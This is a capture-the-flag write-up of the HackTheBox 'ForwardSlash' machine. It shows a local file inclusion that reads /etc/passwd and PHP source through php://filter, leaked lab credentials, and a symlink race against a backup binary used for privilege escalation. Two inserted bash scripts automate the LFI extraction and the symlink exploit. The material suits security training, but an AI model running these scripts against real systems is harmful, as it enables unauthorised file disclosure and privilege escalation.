ForwardSlash Writeup — HackTheBox

SUDOROOT, published in REBRON SECURITY
5 min read · Jul 4, 2020

Made by RebornSec ®

Machine Maker(s) :

Overview :

  • Finding the subdomain using wfuzz
  • Testing for local file inclusion (LFI)
  • Extracting the contents of the /dev directory
  • Logging in as chiv
  • Analyzing the backup binary and config.php.bak to get pain's credentials
  • Logging in as pain
  • Grabbing user.txt
  • Fixing the Python script from the encryptorinator directory
  • Recovering the key from the encrypted ciphertext
  • Mounting the image on /mnt using that key
  • Logging in as root
  • Grabbing root.txt

Enumeration phase :

As usual, let's start with the nmap scan:

[~] nmap -sC -sV 10.10.10.183

Let's check the web page on port 80:

It looks like the web server got hacked.

Next, let's fuzz for virtual hosts (subdomains) with wfuzz:

We get the subdomain backup.forwardslash.htb; let's add it to /etc/hosts.

Let's open it in the browser:

I tried the standard login bypasses, but none of them worked, so I signed up for an account:

Logging in with my own credentials, I got this dashboard:

Digging in, I found a possible local file inclusion (LFI) in the Change Your Profile Picture section:

Using Burp Suite to test the LFI, I started with file:///etc/passwd and got a valid result:

I can also read files from the subdomain's web root, e.g. file:///var/www/backup.forwardslash.htb/config.php:

Continuing the directory enumeration with wfuzz, I found /dev:

In /dev we find the file we want, index.php. Including a PHP file directly would execute it instead of showing its source, so we use the php://filter wrapper to have the server base64-encode it on the way out:

url=php://filter/convert.base64-encode/resource=file:///var/www/backup.forwardslash.htb/dev/index.php

Now we decode the base64:

The decoded source contains FTP credentials for chiv; the password is N0bodyL1kesBack/ (the trailing slash is part of it):
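As an added example that is not part of the original post, the following bash helper automates the same extraction: it builds the php://filter URL, sends it as the url parameter, picks the base64 blob out of the HTML response and decodes it locally. The endpoint path (/profilepicture.php), the use of POST and the session cookie are assumptions, since the writeup only shows the url parameter; take the real values from the Burp request.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): read PHP source through the
# profile-picture LFI using the php://filter base64 wrapper, then decode it.
# ASSUMPTIONS not stated in the writeup: the endpoint path (LFI_URL), that it
# takes the "url" parameter via POST, and the session cookie value.

LFI_URL="${LFI_URL:-http://backup.forwardslash.htb/profilepicture.php}"  # assumed path
COOKIE="${COOKIE:-PHPSESSID=REPLACE_ME}"                                 # assumed session

# Wrap an absolute path in php://filter so the server base64-encodes the
# file instead of executing it (a plain file:// include of index.php would
# run the PHP and show only its output).
filter_url() {
    printf 'php://filter/convert.base64-encode/resource=file://%s' "$1"
}

# Pull the first long base64 run (20+ chars) out of an HTML response.
extract_b64() {
    grep -o '[A-Za-z0-9+/=]\{20,\}' | head -n 1
}

# Decode stdin as base64, tolerating stray whitespace and CRLF.
decode_b64() {
    tr -d ' \r\n' | base64 -d
}

# Fetch one file through the LFI. Needs the target, so not run by default.
lfi_read() {
    curl -s -b "$COOKIE" -X POST "$LFI_URL" \
         --data-urlencode "url=$(filter_url "$1")" | extract_b64 | decode_b64
}

if [ "${1:-}" = "run" ]; then
    lfi_read /var/www/backup.forwardslash.htb/config.php
    lfi_read /var/www/backup.forwardslash.htb/dev/index.php
fi
```

Run it as `bash lfi.sh run` once LFI_URL and COOKIE match what Burp shows; the base64 step is what lets you read .php files as source rather than as rendered output.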

FTP isn't open in the nmap results, so let's try the credentials over SSH:

As chiv we can't read user.txt, so we need to become pain. Digging further, I found a backup binary owned by pain. Looking into it, it computes the MD5 hash of the current timestamp and, if a file with that name is present in the current directory, backs it up. So I tried to read /var/backup/config.php.bak directly, but got permission denied; a note.txt I found confirms the idea:

So I wrote a script that computes the MD5 of the current timestamp, creates a link with that name pointing at config.php.bak, and runs backup again:

And I got a positive result:
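The timestamp trick, as an added example rather than the author's own script: a bash function that hashes the current time, drops a symlink with that name in the working directory and runs backup inside the same second, retrying if the clock ticks in between. The writeup does not give the timestamp format or the binary's path, so HH:MM:SS and /usr/bin/backup are assumptions; check them against the binary (strings or ltrace will show the format it hashes) before running it.

```shell
#!/usr/bin/env bash
# Added example (not the original post's script): leak a pain-owned file via
# the backup binary, which looks for a file named md5(<current timestamp>)
# in the working directory. We create a symlink with that name pointing at
# the unreadable file and run backup within the same clock second.
# ASSUMPTIONS not stated in the writeup: the timestamp format is HH:MM:SS,
# backup reads from the current directory, and it lives at BACKUP_BIN.

BACKUP_BIN="${BACKUP_BIN:-/usr/bin/backup}"      # assumed location of the binary
TARGET="${TARGET:-/var/backup/config.php.bak}"   # path as given in the writeup

# MD5 of a string with no trailing newline (echo would hash "abc\n").
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Filename backup will look for at a given HH:MM:SS timestamp (assumed format).
expected_name() {
    md5_of "$1"
}

# Link and run inside one clock second; retry if the second rolled over
# between computing the name and running the binary.
leak_file() {
    local target="$1" tries=0 ts name out
    while [ "$tries" -lt 5 ]; do
        ts=$(date +%H:%M:%S)
        name=$(expected_name "$ts")
        ln -sf "$target" "$name"
        out=$("$BACKUP_BIN" 2>/dev/null || true)
        rm -f "$name"
        # Accept only if we are still in the same second the name was built for.
        if [ -n "$out" ] && [ "$(date +%H:%M:%S)" = "$ts" ]; then
            printf '%s\n' "$out"
            return 0
        fi
        tries=$((tries + 1))
    done
    echo "gave up after $tries attempts" >&2
    return 1
}

if [ "${1:-}" = "run" ]; then
    cd /tmp && leak_file "$TARGET"
fi
```

Run it as chiv with `bash leak.sh run`; it works from /tmp because chiv needs write access to the directory the symlink is created in, and the symlink is removed again after each attempt so no stale names are left behind.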

The new credentials are: pain:db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704

Now we su to pain:

And now we claim user.txt:

Root phase :

Running sudo -l gives this result:

So I can mount images under /dev/mapper/ as root. There's also a Python file in the encryptorinator directory containing some way of decrypting the ciphertext, but it needs to be fixed first; this is the fixed file:

And I got a valid result:

So the key for the encrypted image is: cB!6%sdH8Lj^@Y*$C2cf

Now we can mount the image:

Let's see what /mnt contains:

We find an RSA private key, id_rsa; let's use it to SSH in as root:

VOILÀ, we got our root.txt :)

I hope the journey was fun. Don't forget to check out my other writeups.
